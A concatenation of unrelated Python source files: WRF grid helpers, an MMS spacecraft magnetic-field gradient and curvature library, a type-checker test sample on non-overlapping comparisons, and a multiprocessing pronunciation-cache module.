coords = original_mesh[list(WRF_NEW_COORDS)].rename(WRF_NEW_COORDS)
mesh = mesh.assign_coords(coords).rename_dims(WRF_NEW_DIMS)
mesh = mesh.isel(x_g=slice(None, -1), y_g=slice(None, -1))
xgrid = build_xgrid(mesh)
lon_F = xgrid.interp(mesh.lon_U, 'Y', boundary='fill', fill_value=np.nan)
lat_F = xgrid.interp(mesh.lat_V, 'X', boundary='fill', fill_value=np.nan)
mesh = mesh.assign_coords(lon_F=lon_F, lat_F=lat_F)
dlon_T = xgrid.diff(mesh.lon_U, 'X', boundary='fill', fill_value=np.nan)
dlon_U = xgrid.diff(mesh.lon_T, 'X', boundary='fill', fill_value=np.nan)
dlon_V = xgrid.diff(mesh.lon_F, 'X', boundary='fill', fill_value=np.nan)
dlon_F = xgrid.diff(mesh.lon_V, 'X', boundary='fill', fill_value=np.nan)
dlat_T = xgrid.diff(mesh.lat_V, 'Y', boundary='fill', fill_value=np.nan)
dlat_U = xgrid.diff(mesh.lat_F, 'Y', boundary='fill', fill_value=np.nan)
dlat_V = xgrid.diff(mesh.lat_T, 'Y', boundary='fill', fill_value=np.nan)
dlat_F = xgrid.diff(mesh.lat_U, 'Y', boundary='fill', fill_value=np.nan)
dx_T, dy_T = dlondlat_dxdy(dlon_T, dlat_T, mesh.lon_T, mesh.lat_T)
dx_U, dy_U = dlondlat_dxdy(dlon_U, dlat_U, mesh.lon_U, mesh.lat_U)
dx_V, dy_V = dlondlat_dxdy(dlon_V, dlat_V, mesh.lon_V, mesh.lat_V)
dx_F, dy_F = dlondlat_dxdy(dlon_F, dlat_F, mesh.lon_F, mesh.lat_F)
mesh = mesh.assign_coords(dx_T=dx_T, dy_T=dy_T, dx_U=dx_U, dy_U=dy_U,
dx_V=dx_V, dy_V=dy_V, dx_F=dx_F, dy_F=dy_F)
return mesh
def rename_dims(ds):
ds = ds.rename_dims(WRF_NEW_DIMS)
return ds
def rename_coords_and_dims(ds, grid='T'):
ds = ds.rename(WRF_NEW_COORDS).rename(WRF_NEW_DIMS)
return ds
def open_netcdf_dataset(files, mesh_file=None, grid='T', variables=None,
**kwargs):
ds = xr.open_mfdataset(files, concat_dim='Time', combine='nested',
drop_variables=['XLON', 'XLAT'], **kwargs)
ds = ds.rename_dims(WRF_NEW_DIMS)
ds = ds.isel(x_g=slice(None, -1), y_g=slice(None, -1))
time = pd.to_datetime(ds.Times.load().astype('str').data,
format='%Y-%m-%d_%H:%M:%S')
ds = ds.assign_coords(Time=time).rename({'Time': 'time'})
mesh = read_mesh(mesh_file)
ds = ds.assign_coords(mesh.variables)
if variables is not None:
ds = ds[variables]
return ds
def build_xgrid(ds, periodic=False, metric=None):
xgrid = Grid(ds, periodic=periodic,
coords={'X': {'center': 'x_c', 'left': 'x_g'},
'Y': {'center': 'y_c', 'left': 'y_g'}})
return xgrid
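# Rough numeric check (added sketch, not part of the original module) of
# dlondlat_dxdy: a 0.1 degree step at 45N is roughly 7.9 km in x and 11.1 km
# in y for the 6371 km spherical Earth radius assumed above.
if __name__ == '__main__':
    dx_demo, dy_demo = dlondlat_dxdy(dlon=0.1, dlat=0.1, lon=0.0, lat=45.0)
    print("dx ~ %.1f km, dy ~ %.1f km" % (dx_demo / 1000, dy_demo / 1000))  # ~7.9 km, ~11.1 km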
|
from .admin_controller import AdminController, add_admin_handler
__all__ = ['AdminController', 'add_admin_handler']
|
'''
python3 + numpy routine to calculate magnetic curvature from MMS data.
Uses pyspedas for MMS data file loading
*****************************************************************************
Example script for loading required data and calculating the curvature vector:
import time
import re
import numpy as np
from mms_curvature import DataLoad, mms_Grad, mms_Curvature
timeStart = time.strftime("%H:%M:%S", time.localtime())
print("Files Loading:")
data,metadata = DataLoad(trange=['2017-05-04', '2017-05-05'])
postimes = [data['mec'][n]['x'] for n in data['mec'] if re.compile('mms\d_mec_r_gsm_srvy_l2').match(n)]
posvalues = [data['mec'][n]['y'] for n in data['mec'] if re.compile('mms\d_mec_r_gsm_srvy_l2').match(n)]
magtimes = [data['fgm'][n]['x'] for n in data['fgm'] if re.compile('mms\d_fgm_b_gsm_srvy_l2').match(n)]
magvalues = [data['fgm'][n]['y'] for n in data['fgm'] if re.compile('mms\d_fgm_b_gsm_srvy_l2').match(n)]
print("Time started: ", timeStart)
print("Time Loaded: ", time.strftime("%H:%M:%S", time.localtime()))
grad_Harvey, bm, bmag, rm, t_master = mms_Grad(postimes, posvalues, magtimes, magvalues)
curve_Harvey = mms_Curvature(grad_Harvey, bm)
np.savetxt("t_master.csv", t_master, delimiter=",")
np.savetxt("curve_Harvey.csv", curve_Harvey, delimiter=",")
np.save("grad_Harvey.npy", grad_Harvey)
# end
****************************************************************************
---TJR 10.09.2020
NOTE: Need to update the docstring for mms_Grad after refactoring
'''
import numpy as np
def mms_Grad(postimes=None, posvalues=None, magtimes=None, magvalues=None, normalize=True):
'''
Calculates the spatial gradient and curvature vector of the magnetic field.
Returns those and the master time (interpolated from FGM data) as numpy arrays
normalize: if True, normalizes magnetic field vectors before continuing the
calculation; required for calculating curvature
if False leaves magnetic field as full vector with magnitude;
required for calculating curl and divergence
'''
# Number of spacecraft in inputs. Assumed from number of position time arrays.
numBirds = len(postimes)
# Sanity check. Throw an error if number of time arrays and data arrays don't all match.
if len(posvalues) != numBirds: raise ValueError('Number of position value arrays does not match number of position time arrays!')
if len(magtimes) != numBirds: raise ValueError('Number of magnetic field time arrays does not match number of position time arrays!')
if len(magvalues) != numBirds: raise ValueError('Number of magnetic field value arrays does not match number of position time arrays!')
bn = [None]*numBirds
if normalize:
# normalize magnetic fields
if magvalues[0].shape[-1] == 4: # tests for |B| given as 4th vector in data
for bird in range(numBirds):
bn[bird] = magvalues[bird][:,0:3]/magvalues[bird][:,3,np.newaxis]
else:
for bird in range(numBirds): # else calculates |B| from the 3-vector given
bn[bird] = magvalues[bird]/np.linalg.norm(magvalues[bird], axis=1).reshape(magvalues[bird].shape[0], 1)
else:
# use magnetic fields without normalizing
for bird in range(numBirds):
bn[bird] = magvalues[bird][:,0:3]
# find probe with latest beginning point for magnetic field data
firsttimes = []
lasttimes = []
for bird in range(numBirds):
firsttimes.append(magtimes[bird][0])
lasttimes.append(magtimes[bird][-1])
mastersc = np.argmax(firsttimes)
# find earliest end time for all spacecraft in range
tend = min(lasttimes)
tend_i = 0 # initialize counting index for finding ending index for master S/C
# initialize master time sequence by trimming time from last S/C to start (mastersc)
while magtimes[mastersc][tend_i] < tend: tend_i += 1
t_master = magtimes[mastersc][0:(tend_i+1)]
# master mag field data arr, with interpolated values
# Magnetic field data, interpolated to the previously determined master time sequence
barr=np.ndarray((numBirds,t_master.shape[0],3))
for bird in range(numBirds):
barr[bird,:,0] = np.interp(t_master, magtimes[bird], bn[bird][:,0])
barr[bird,:,1] = np.interp(t_master, magtimes[bird], bn[bird][:,1])
barr[bird,:,2] = np.interp(t_master, magtimes[bird], bn[bird][:,2])
# Calculate average |B| for export
Bvals = [None]*numBirds
if magvalues[0].shape[-1] == 4: # tests for |B| given as 4th vector in data
for bird in range(numBirds):
Bvals[bird] = np.interp(t_master, magtimes[bird], magvalues[bird][:,3])
else:
for bird in range(numBirds): # else calculates |B| from the 3-vector given
Bvals[bird] = np.interp(t_master, magtimes[bird], np.linalg.norm(magvalues[bird], axis=1))
bmag = np.average(Bvals, axis=0)
# master position data array, with interpolated value
# Spacecraft position data, interpolated to the previously determined master time sequence
rarr = np.ndarray((numBirds,t_master.shape[0],3))
for bird in range(numBirds):
rarr[bird,:,0] = np.interp(t_master, postimes[bird], posvalues[bird][:,0])
rarr[bird,:,1] = np.interp(t_master, postimes[bird], posvalues[bird][:,1])
rarr[bird,:,2] = np.interp(t_master, postimes[bird], posvalues[bird][:,2])
# Now all magnetic fields and positional data are of the same cadence and at the same times for each index
# Indices are: [s/c(0=mms1, 1=mms2, 2=mms3, 3=mms4), time_step, vector(0=x, 1=y, 2=z)]
# ie. rarr[<spacecraft>, <timestep_index>, <cartesian_component_of_vector>]
# eg. Y-position of mms4 at first time step: rarr[3,0,1]
# calculate position and magnetic field at mesocenter of the fleet
# Commenting old implementation
#rm = np.ndarray((t_master.shape[0], 3))
#for i in range(t_master.shape[0]): # populate each element of the mesocenter with the average across all four s/c
# for j in range(3): # there's got to be a way to vectorize this
# #print("rm:", rm.shape, "rarr:", rarr.shape)
# rm[i,j] = (1./4.)*(rarr[0,i,j]+rarr[1,i,j]+rarr[2,i,j]+rarr[3,i,j])
#
#bm = np.ndarray((t_master.shape[0], 3))
#for i in range(t_master.shape[0]): # populate each element of the mesocenter with the average across all four s/c
# for j in range(3): # there's got to be a way to vectorize this
# bm[i,j] = (1./4.)*(barr[0,i,j]+barr[1,i,j]+barr[2,i,j]+barr[3,i,j])
# End of old implementation.
# Vectorized version of above, using numpy built-in ufuncs.
# - inner operation `np.add.reduce(input, axis=0)`: .reduce collapses the input array along the specified
# axis (0 by default), using the prefaced ufunc (add) to merge array values.
# Layman's version: Add up the respective coordinate components from each bird.
# - outer operation `np.divide(input1,input2)`: Divides each element in input1 by the respective element
# in input 2. If input2 is of lesser dimensions than input1, input2 will be expanded/broadcast to fit.
# Layman's version: Divide each component of the inner results by the number of birds.
rm = np.divide(np.add.reduce(rarr),rarr.shape[0])
bm = np.divide(np.add.reduce(barr),barr.shape[0])
# Calculate volumetric tensor (Harvey, Ch 12.4, Eq 12.23, from "Analysis Methods for Multi-Spacecraft Data" Paschmann ed.)
## Section: old, not-actually correct code
#Rvol = np.ndarray((t_master.shape[0], 3, 3))
#for i in range(t_master.shape[0]):
# #rvol_step = np.zeros([3,3]) # Stepwise method gives same result as explicit below
# #for sc in range(4):
# # rvol_step = rvol_step + np.outer(rarr[sc,i,:], rarr[sc,i,:])
# ## endfor
# #Rvol[i,:,:] = (1./4.) * (rvol_step - np.outer(rm[i,:], rm[i,:]))
# #Rvol[i,:,:] = (1./4.)*((np.outer(rarr[0,i,:], rarr[0,i,:]) + np.outer(rarr[1,i,:], rarr[1,i,:]) + np.outer(rarr[2,i,:], rarr[2,i,:]) + np.outer(rarr[3,i,:], rarr[3,i,:])) - np.outer(rm[i,:], rm[i,:])) # give same result as stepwise above
# Intermediate variable to hold the self-outer-product of rm at each timestep
##rmOuter = np.einsum('...i,...j->...ij',rm,rm) # explicit form 'outer product' use of EinSum, broadcast across leading dimensions
# Intermediate variable to hold the self-outer-product of rarr, per bird, at each timestep
##rarrOuter = np.einsum('...i,...j->...ij',rarr,rarr) # Same as line above
##Rvol = np.divide(np.add.reduce(rarrOuter) - rmOuter, rarr.shape[0]) # give same result as stepwise Rvol code commented out above.
# Brief description of operations in above line:
# All of the following occur for each timestep...
# 1) Collapse the self-outer-products of rarr by summing across all spacecraft
# 2) From above result, subtract the self-outer-product of rm (position of mesocenter)
# 3) Divide resultant array from above step by the number of spacecraft
## End Section: old, not-actually correct code
## Explicit equation construction from "Analysis Methods for Multi-Spacecraft Data" Paschmann ed.
rrarr = np.matmul(rarr[:,:,:,None], rarr[:,:,None,:]) # the r_a*r_a^T term from (12.23)
rmrm = np.matmul(rm[:,:,None], rm[:,None,:]) # the r_b*r_b^T term from (12.23)
# This just expands the r_b*r_b^T term to match the shape of rrarr above for easy broadcast of the subtraction and summation
# rmrm_expanded = np.repeat(rmrm[None,:,:,:], repeats=rrarr.shape[0], axis=0)
# partial_R is every term inside the summation of (12.23)
# ie. R = 1/N * sum(n=1..numBirds, partial_R[n])
# partial_R = rrarr - rmrm_expanded
# result is R as defined by (12.23) for all time steps, with shape (timesteps, 3, 3)
Rvol = np.subtract(np.divide(np.add.reduce(rrarr, axis=0), rarr.shape[0]), rmrm) # more efficient - AJR
# Rvol = np.divide(np.add.reduce(partial_R),partial_R.shape[0])
# Pre-calculate the inverse array of Rvol here to avoid needless recalculation later.
Rinv = np.linalg.inv(Rvol)
# Stepwise calculation of gradient and curvature using the Harvey method
#a_ne_b_list=[[1,2,3],[2,3],[3]]
#grad_Harvey = np.ndarray((t_master.shape[0], 3, 3))
#curve_Harvey = np.ndarray((t_master.shape[0], 3))
#for t in range(t_master.shape[0]): # steps through each time step
# for i in range(3): # for final i-component of the gradient
# for j in range(3): # for final j-component of the gradient
# dbdr = np.zeros(3) # a != b summation row vector from Harvey. Re-initialized as zeros for each i,j
# for k in range(3): # step through k-index. May be able to eliminate this with vectorization later
# for a in range(3): # step through spacecraft MMS1-3; MMS4 done implicitly
# for b in a_ne_b_list[a]: # Does not contain MMS1 (done by stepping through it in previous loop); provides sc_a != sc_b summation in Harvey (12.18)
# dbdr[k] = dbdr[k] + ((barr[a,t,i] - barr[b,t,i]) * (rarr[a,t,k] - rarr[b,t,k]))
# # endfor
# # endfor
# # endfor
# # grad_Harvey[t,i,j] = (1./16.) * np.matmul(dbdr, Rinv[t,:,j]) # Gives the same result as below
# grad_Harvey[t,i,j] = (1./16.) * np.matmul(Rinv[t,:,j], dbdr) # Gives the same result as below
# #grad_Harvey[t,i,j] = (1./16.) * np.matmul(dbdr, np.linalg.inv(Rvol[t,:,:])[:,j]) # Maybe linalg.inv doesn't vectorize the way I think?
# # endfor
# # curve_Harvey[t,:] = np.matmul(bm[t,:], grad_Harvey[t,:,:]) # same thing, probably just should be matrix mult.
# curve_Harvey[t,:] = np.matmul(grad_Harvey[t,:,:], bm[t,:]) # Order of matmul has BIG effect!
## endfor
# Vectorized matrix operations to calculate the above. Saves a lot of compute time at the expense of a little memory.
tmpR = np.repeat(rarr[np.newaxis,:,:,:],rarr.shape[0],axis=0) # Stretch the array to be 2-D instead of 1-D for the sats. Required for next operation.
# triR = np.triu(np.rollaxis(np.rollaxis(np.transpose(tmpR,axes=(1,0,2,3)) - tmpR, -1), -1)) # This produces a triangular matrix of dR=D_a - D_b, for all [a != b]
diffR = np.subtract(np.moveaxis(tmpR, [0,1], [1,0]), tmpR)
triR = np.moveaxis(np.triu(np.moveaxis(diffR, [0,1], [-2,-1]), 1), [-2,-1], [0,1]) # updated from the deprecated 'rollaxis' and makes what's happening a bit more readable -AJR
tmpB = np.repeat(barr[np.newaxis,:,:,:],barr.shape[0],axis=0) # Same as above, but with B instead
# triB = np.triu(np.rollaxis(np.rollaxis(np.transpose(tmpB,axes=(1,0,2,3)) - tmpB, -1), -1)) # Again, dB=B_a - B_b, for all [a != b]
diffB = np.subtract(np.moveaxis(tmpB, [0,1], [1,0]), tmpB)
triB = np.moveaxis(np.triu(np.moveaxis(diffB, [0,1], [-2,-1]), 1), [-2,-1], [0,1])
#Example of effect of above operations:
# Each b_i below is a 3-vector
#
# First step (tmpB, at each timestep):
# tmpB =
# [[b_1, b_2, b_3, b_4],
# [b_1, b_2, b_3, b_4],
# [b_1, b_2, b_3, b_4],
# [b_1, b_2, b_3, b_4]]
#
# Second step (diffB, then triB); the first array is the intermediate form (again, at each timestep):
# diffB =
# [[b_1-b_1, b_1-b_2, b_1-b_3, b_1-b_4],
# [b_2-b_1, b_2-b_2, b_2-b_3, b_2-b_4],
# [b_3-b_1, b_3-b_2, b_3-b_3, b_3-b_4],
# [b_4-b_1, b_4-b_2, b_4-b_3, b_4-b_4]]
#
# triB =
# [[0 , b_1-b_2, b_1-b_3, b_1-b_4],
# [0 , 0 , b_2-b_3, b_2-b_4],
# [0 , 0 , 0 , b_3-b_4],
# [0 , 0 , 0 , 0 ]]
# For each timestep t, dtemp[:,t,:] now looks like this:
# dtemp[:,t] = [[dB_x*dR_x, dB_y*dR_y, dB_z*dR_z],
# [dB_x*dR_y, dB_y*dR_z, dB_z*dR_x],
# [dB_x*dR_z, dB_y*dR_x, dB_z*dR_y]]
# The below constructs dbdr by twisting the dtemp array to properly place the diagonals for dbdr.
#
# dbdr[t] = [[dtemp[0,t,0], dtemp[1,t,0], dtemp[2,t,0],
# [dtemp[2,t,1], dtemp[0,t,1], dtemp[1,t,1],
# [dtemp[1,t,2], dtemp[2,t,2], dtemp[0,t,2]]
#
# ===
#
# dbdr[t] = [[dB_x*dR_x, dB_x*dR_y, dB_x*dR_z],
# [dB_y*dR_x, dB_y*dR_y, dB_y*dR_z],
# [dB_z*dR_x, dB_z*dR_y, dB_z*dR_z]]
#
dbdr = np.add.reduce(np.einsum('...i,...j->...ij', triB, triR), axis=(0,1)) # creates a [time, 3x3 array] array
grad_Harvey = (1/rarr.shape[0])**2 * np.matmul(dbdr, Rinv) # same as np.einsum('...ij,...jk->...ik', dbdr, Rinv)
# The calculated gradient (B_i/d_j) is transposed from the accepted index order for the gradient (d_i B_j), so the last thing we do is swap the last two axes
grad_Harvey = np.moveaxis(grad_Harvey, [-2,-1], [-1,-2])
# The above is certainly more readable than the version below and (fingers crossed) clears up an inverted vector issue in the code following - AJR
### # Calculate the partial components for dbdr
### dtemp = np.ndarray((3, t_master.shape[0], 3))
### dtemp[0] = np.einsum('...ab,...ab',triB,triR) #This gets us the diagonals of dbdr for B_i and R_i (eg, both x components, both y, ...)
### dtemp[1] = np.einsum('...ab,...ab',triB,np.roll(triR,-1,axis=1)) #This gets us the diagonals of dbdr for B_i and R_mod(i+1) (eg, B_x * R_y, ...)
### dtemp[2] = np.einsum('...ab,...ab',triB,np.roll(triR,-2,axis=1)) #This gets us the diagonals of dbdr for B_i and R_mod(i+2) (eg, B_y * R_x, ...)
###
### # Constructs dbdr matrix for each timestep, where dbdr[i,j] will return the relevant dB_i*dR_j resultant vector
### dbdr = np.einsum('...i,...ij->...ij',dtemp[0],np.identity(3)) + \
### np.einsum('...i,...ij->...ij',dtemp[1],(np.roll(np.identity(3),-1,axis=0))) + \
### np.einsum('...i,...ij->...ij',dtemp[2],(np.roll(np.identity(3),-2,axis=0)))
###
### # This calculates and holds the diagonals for the Harvey gradient. I'm sure there's some simpler way to calculate this, but I haven't found it yet.
### # This eventually gets us to the Harvey gradients in the same manner as we got dbdr above.
### tmpHarv = np.ndarray((3, t_master.shape[0], 3))
### tmpHarv[0] = np.divide(np.einsum('...i,...i',np.moveaxis(Rinv,1,-1),dbdr),np.square(numBirds))
### tmpHarv[1] = np.divide(np.einsum('...i,...i',np.moveaxis(Rinv,1,-1),np.roll(dbdr,-1,1)),np.square(numBirds))
### tmpHarv[2] = np.divide(np.einsum('...i,...i',np.moveaxis(Rinv,1,-1),np.roll(dbdr,-2,1)),np.square(numBirds))
###
### # Constructs the gradient matrix for each timestep from the diagonals calculated in the above steps.
### grad_Harvey = \
### np.einsum('...i,...ij->...ij',tmpHarv[0],np.identity(3)) + \
### np.einsum('...i,...ij->...ij',tmpHarv[1],(np.roll(np.identity(3),-1,axis=0))) + \
### np.einsum('...i,...ij->...ij',tmpHarv[2],(np.roll(np.identity(3),-2,axis=0)))
## List of references for how numpy.einsum operates:
#
# Official docs on einsum (as of numpy 1.18): https://numpy.org/doc/1.18/reference/generated/numpy.einsum.html
# General explanation of einsum: https://stackoverflow.com/a/33641428
# Levi-Civita and einsum: https://stackoverflow.com/a/20890335
# A specific instance of Levi-Civita with einsum: https://stackoverflow.com/a/20910319
# Solenoid correction was implemented then removed due to negligible impact on results.
# Original stepwise code for the solenoid correction is preserved in the string below in case of future need.
'''
# Solenoid correction from Harvey (12.20)
# lm = np.ndarray((t_master.shape[0]))
lm = np.divide(np.trace(grad_Harvey, axis1=1, axis2=2), np.trace(Rinv, axis1=1, axis2=2))
nRinv = np.ndarray(Rinv.shape)
for t in range(t_master.shape[0]):
nRinv[t,:,:] = lm[t]*Rinv[t,:,:]
sol_grad_Harvey = grad_Harvey - nRinv
sol_curve_Harvey = np.ndarray((t_master.shape[0], 3))
for t in range(t_master.shape[0]):
sol_curve_Harvey[t,:] = np.matmul(sol_grad_Harvey[t,:,:], bm[t,:])
''' # Solenoid correction has little effect, which is not surprising
return grad_Harvey, bm, bmag, rm, t_master
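# Added sketch (not part of the original routine): a small check that the
# vectorized mesocenter step above -- np.add.reduce over the spacecraft axis
# followed by a divide -- matches an explicit per-timestep average. Shapes
# follow the convention [spacecraft, time_step, xyz] used in mms_Grad.
def _mesocenter_demo():
    rng = np.random.default_rng(0)
    rarr = rng.normal(size=(4, 5, 3))   # 4 birds, 5 time steps, 3 components
    rm_vectorized = np.divide(np.add.reduce(rarr), rarr.shape[0])
    rm_loop = np.zeros((5, 3))
    for t in range(5):
        for j in range(3):
            rm_loop[t, j] = rarr[:, t, j].mean()
    assert np.allclose(rm_vectorized, rm_loop)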
def mms_Curvature(grad, bm):
'''
function to calculate magnetic field line curvature vector k = b · grad(b) from the
magnetic field spatial gradient (grad) and the normalized magnetic field vector at
the barycenter of the spacecraft formation (bm)
Inputs:
grad : a time series array with dimensions t x 3 x 3 representing the spatial
gradient of the normalized magnetic field grad(b) at each time step.
Assumed to be the output from the mms_Grad function described in this
library module.
bm : a time series array with dimensions t x 3 representing the normalized
vector magnetic field b = B/|B| at each time step. Assumed to be the
output of the mms_Grad function described in this library.
---NB: 'grad' and 'bm' are assumed to have identical timesteps, beginning, and
ending times, as expected from the outputs of the mms_Grad function
described in this library.
Outputs:
curve_Harvey : a time series array with dimensions t x 3 representing the
magnetic field line curvature vector in 3 dimensions at the
same time steps as used for the input arrays.
'''
# And now the final curvature may be calculated by simple matrix multiplication for each timestep.
# The below gives identical results to, but is much more efficient than:
# for t in range(t_master.shape[0]): curve_Harvey[t] = np.matmul(bm[t], grad_Harvey[t])
curve_Harvey = np.einsum('...ij,...i', grad, bm)
return curve_Harvey
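# Added sketch showing what the einsum above computes: with grad indexed as
# [time, i, j] = d_i b_j (the convention stated in mms_Grad), the curvature
# k_j = b_i d_i b_j, i.e. bm[t] @ grad[t] at every time step.
def _curvature_demo():
    rng = np.random.default_rng(1)
    grad = rng.normal(size=(6, 3, 3))
    bm = rng.normal(size=(6, 3))
    k_einsum = np.einsum('...ij,...i', grad, bm)
    k_loop = np.stack([bm[t] @ grad[t] for t in range(6)])
    assert np.allclose(k_einsum, k_loop)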
def mms_CurlB(Grad):
'''
Function to calculate the curl of the magnetic field by applying a rank 3
Levi-Civita tensor to the spatial gradient of the full vector magnetic
field (NOTE: NOT the gradient of the normalized vector magnetic field as
used in the curvature vector calculation).
Inputs:
Grad : A time series array with dimensions t x 3 x 3 representing the
spatial gradient of the vector magnetic field grad(B) at each
time step. Assumed to be the output from the mms_Grad function
described in this library module.
Outputs:
CurlB : A time series array with dimensions t x 3 representing the curl
of the vector magnetic field in 3 dimensions at the same time
steps as used for the input Grad array.
'''
# Define the rank 3 Levi-Civita tensor
LevCiv3 = np.zeros((3,3,3))
LevCiv3[0,1,2] = LevCiv3[1,2,0] = LevCiv3[2,0,1] = 1
LevCiv3[0,2,1] = LevCiv3[2,1,0] = LevCiv3[1,0,2] = -1
CurlB = np.einsum('ijk,...jk',LevCiv3, Grad)
return CurlB
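# Added sketch: a quick consistency check of the Levi-Civita contraction in
# mms_CurlB. For B = (0, x, 0) the spatial gradient has d_x B_y = 1 and nothing
# else, so curl(B) should come out as (0, 0, 1) at every time step.
def _curl_demo():
    grad = np.zeros((2, 3, 3))   # two time steps, indexed [t, i, j] = d_i B_j
    grad[:, 0, 1] = 1.0          # d_x B_y = 1
    assert np.allclose(mms_CurlB(grad), [[0.0, 0.0, 1.0]] * 2)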
def mms_DivB(Grad):
'''
Function to calculate the divergence of the magnetic field by taking the
trace of the spatial gradient of the full vector magnetic field (NOTE:
NOT the gradient of the normalized vector magnetic field as used in the
curvature vector calculation).
Inputs:
Grad : A time series array with dimensions t x 3 x 3 representing the
spatial gradient of the vector magnetic field grad(B) at each
time step. Assumed to be the output from the mms_Grad function
described in this library module.
Outputs:
DivB : A time series array with dimension t representing the divergence
of the vector magnetic field div(B) at the same time steps as
used for the input Grad array.
'''
#DivB = np.einsum('...ii', Grad) # Equivalent to taking the trace of grad(B) at each time step
DivB = np.trace(np.swapaxes(Grad, 1,2), axis1=1, axis2=2)
return DivB
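# Added sketch: the divergence is the trace of the gradient, so a field
# B = (x, y, z), whose gradient grad[t, i, j] = d_i B_j is the identity,
# should give div(B) = 3 at every time step.
def _div_demo():
    grad = np.repeat(np.eye(3)[None, :, :], 4, axis=0)
    assert np.allclose(mms_DivB(grad), 3.0)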
|
# This sample tests the check for non-overlapping types compared
# with equals comparison.
from typing import Literal, TypeVar, Union
OS = Literal["Linux", "Darwin", "Windows"]
def func1(os: OS, val: Literal[1, "linux"]):
if os == "Linux":
return True
# This should generate an error because there is no overlap in types.
if os == "darwin":
return False
# This should generate an error because there is no overlap in types.
if os != val:
return False
# This should generate an error because there is no overlap in types.
if val == 2:
return False
if val == 1:
return True
class ClassA: ...
class ClassB: ...
_T1 = TypeVar("_T1")
_T2 = TypeVar("_T2", bound=ClassB)
def func2(a: ClassA, b: ClassB, c: _T1, d: _T2, e: Union[ClassA, ClassB]) -> Union[None, _T1, _T2]:
# This should generate an error because there is no overlap in types.
if a == b:
return
# This should generate an error because there is no overlap in types.
if a != b:
return
if a != c:
return
# This should generate an error because there is no overlap in types.
if a != d:
return
if a == e:
return
if b == e:
return
|
from functools import partial
from logging import getLogger
from multiprocessing import Pool
from typing import Any, Callable, Dict, Optional, Set, Tuple
from ordered_set import OrderedSet
from tqdm import tqdm
from sentence2pronunciation.core import (get_words_from_sentence, get_words_from_sentences, is_annotation,
sentence2pronunciation_from_cache,
symbols_split_iterable,
word2pronunciation)
from sentence2pronunciation.lookup_cache import (LookupCache,
pronunciation_upper)
from sentence2pronunciation.types import Pronunciation, Symbol
def return_input_too(inp: Any, method: Callable[[Any], Any]) -> Tuple[Any, Any]:
return inp, method(inp)
process_unique_words: OrderedSet[Pronunciation] = None
def __init_pool_prepare_cache_mp(words: OrderedSet[Pronunciation]) -> None:
global process_unique_words
process_unique_words = words
def __main_prepare_cache_mp(word_index: int, trim_symbols: Set[Symbol], split_on_hyphen: bool, consider_annotation: bool, annotation_split_symbol: Optional[Symbol], get_pronunciation: Callable[[Pronunciation], Pronunciation]) -> Tuple[Pronunciation, Pronunciation]:
# pylint: disable=global-variable-not-assigned
global process_unique_words
word = process_unique_words[word_index]
pronunciation = word2pronunciation(
word=word,
get_pronunciation=get_pronunciation,
trim_symbols=trim_symbols,
split_on_hyphen=split_on_hyphen,
consider_annotation=consider_annotation,
annotation_split_symbol=annotation_split_symbol,
)
return word, pronunciation
def prepare_cache_mp(sentences: Set[Pronunciation], trim_symbols: Set[Symbol], split_on_hyphen: bool, consider_annotation: bool, annotation_split_symbol: Optional[Symbol], get_pronunciation: Callable[[Pronunciation], Pronunciation], ignore_case: bool, n_jobs: int, chunksize: int, maxtasksperchild: Optional[int] = None) -> LookupCache:
logger = getLogger(__name__)
logger.info("Getting all words...")
unique_words = get_words_from_sentences(tqdm(sentences))
logger.info("Done.")
if ignore_case:
logger.info("Ignoring case...")
if consider_annotation:
# Note: annotations are taken as they are, i.e. not upper-cased, because it would be unclear which annotation should become the cached value if several keys merged into one after upper-casing.
unique_words = OrderedSet({
word if is_annotation(
word, annotation_split_symbol) else pronunciation_upper(word)
for word in tqdm(unique_words)
})
else:
unique_words = OrderedSet({pronunciation_upper(word) for word in tqdm(unique_words)})
logger.info("Done.")
logger.info("Getting pronunciations...")
method_proxy = partial(
__main_prepare_cache_mp,
get_pronunciation=get_pronunciation,
trim_symbols=trim_symbols,
split_on_hyphen=split_on_hyphen,
consider_annotation=consider_annotation,
annotation_split_symbol=annotation_split_symbol,
)
with Pool(
processes=n_jobs,
initializer=__init_pool_prepare_cache_mp,
initargs=(unique_words,),
maxtasksperchild=maxtasksperchild,
) as pool:
pronunciations_to_words: LookupCache = dict(tqdm(
pool.imap_unordered(method_proxy, range(len(unique_words)), chunksize=chunksize),
total=len(unique_words),
))
logger.info("Done.")
return pronunciations_to_words
process_lookup_cache: LookupCache = None
process_sentences: OrderedSet[Pronunciation] = None
def __main_sentences2pronunciations_from_cache_mp(sentence_index: int, ignore_case: bool, consider_annotation: bool, annotation_split_symbol: Optional[Symbol]) -> Tuple[Pronunciation, Pronunciation]:
# pylint: disable=global-variable-not-assigned
global process_lookup_cache
# pylint: disable=global-variable-not-assigned
global process_sentences
sentence = process_sentences[sentence_index]
pronunciation = sentence2pronunciation_from_cache(
sentence=sentence,
ignore_case=ignore_case,
cache=process_lookup_cache,
consider_annotation=consider_annotation,
annotation_split_symbol=annotation_split_symbol
)
return sentence, pronunciation
def __init_pool_sentences2pronunciations_from_cache_mp(cache: LookupCache, sentences: OrderedSet[Pronunciation]) -> None:
# pylint: disable=global-variable-not-assigned
global process_lookup_cache
# pylint: disable=global-variable-not-assigned
global process_sentences
process_lookup_cache = cache
process_sentences = sentences
def sentences2pronunciations_from_cache_mp(sentences: Set[Pronunciation], ignore_case: bool, consider_annotation: bool, annotation_split_symbol: Optional[Symbol], cache: LookupCache, n_jobs: int, chunksize: int, maxtasksperchild: Optional[int] = None) -> Dict[Pronunciation, Pronunciation]:
logger = getLogger(__name__)
method_proxy = partial(
__main_sentences2pronunciations_from_cache_mp,
ignore_case=ignore_case,
consider_annotation=consider_annotation,
annotation_split_symbol=annotation_split_symbol
)
logger.info("Preparing sentences...")
sentences_with_order = OrderedSet(sentences)
logger.info("Done.")
logger.info("Getting pronunciations from preparation...")
with Pool(
processes=n_jobs,
initializer=__init_pool_sentences2pronunciations_from_cache_mp,
initargs=(cache, sentences_with_order,),
maxtasksperchild=maxtasksperchild,
) as pool:
pronunciations_to_sentences: Dict[Pronunciation, Pronunciation] = dict(tqdm(
pool.imap_unordered(method_proxy, range(len(sentences_with_order)), chunksize=chunksize),
total=len(sentences_with_order),
))
logger.info("Done.")
return pronunciations_to_sentences
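# Added sketch (not part of the package) of the multiprocessing pattern used
# above: the heavy read-only payload is handed to each worker exactly once via
# the Pool initializer and stored in a module-level global, while the submitted
# tasks are only integer indices into that payload.
_demo_payload: OrderedSet = None

def _demo_init(payload: OrderedSet) -> None:
    global _demo_payload
    _demo_payload = payload

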